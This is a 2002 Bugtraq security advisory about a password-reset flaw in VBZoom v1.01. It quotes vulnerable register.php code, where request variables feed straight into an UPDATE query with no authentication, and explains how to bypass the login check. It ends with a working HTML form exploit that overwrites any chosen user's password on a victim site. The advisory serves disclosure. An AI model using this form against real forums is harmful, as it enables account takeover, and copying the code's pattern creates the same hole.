[27346] in bugtraq
Reset any user's password in VBZoom forums
daemon@ATHENA.MIT.EDU (hish _ hish)
Tue Oct 8 17:13:46 2002
Date: 8 Oct 2002 19:41:07 -0000
Message-ID: <20021008194107.4341.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: hish _ hish <hish_hish565@hotmail.com>
To: bugtraq@securityfocus.com
Name: VBZoom
Version Affected: tested on v1.01 maybe other version vulnerable also
Severity: Critical
Category: Password reset
Vendor URL: http://www.vbzoom.com
Author: hish_hish <hish_hish565@hotmail.com>
Date: discloused on 28th August 2002
Published at 8th oct 2002
Description
***********
VBZooM is bulletin board system which written in php,
the problem lay on sql query in file register.php.
and you can reset any user's password (see Details).
Details
*******
see these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
:
:
9: include("login.php"); // wooow here will catch us, so we want to pass
this block.
:
:
10: Exit();
11: }
:
:
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
:
:
:
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
Icq='$Icq',Hotmail='$Hotmail',
Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
AllowMail='$AllowMail',AllowMessage='$AllowMessage',
AllowMailCaseMessage='$AllowMailCaseMessage' where
UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
{
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);
we don't want to execute the block between line 3 and 11 so we pass
invalid values to if statment (line 1).
the lame sql statment lies at line 24 , and it's inside the block (line 14
and 35).
so we will pass valid values to reach the sql statment as follow:
make <form method="POST" action="register.php"> // to enter block in
line 14
assigne 1 to variable $ChangeProfile, and victim UserName to reset his
password
lines 18 - 20 no comment !!
lines 24 - 35 :)
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php"
method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
Fix Information
***************
Contact http://www.vbzoom.com
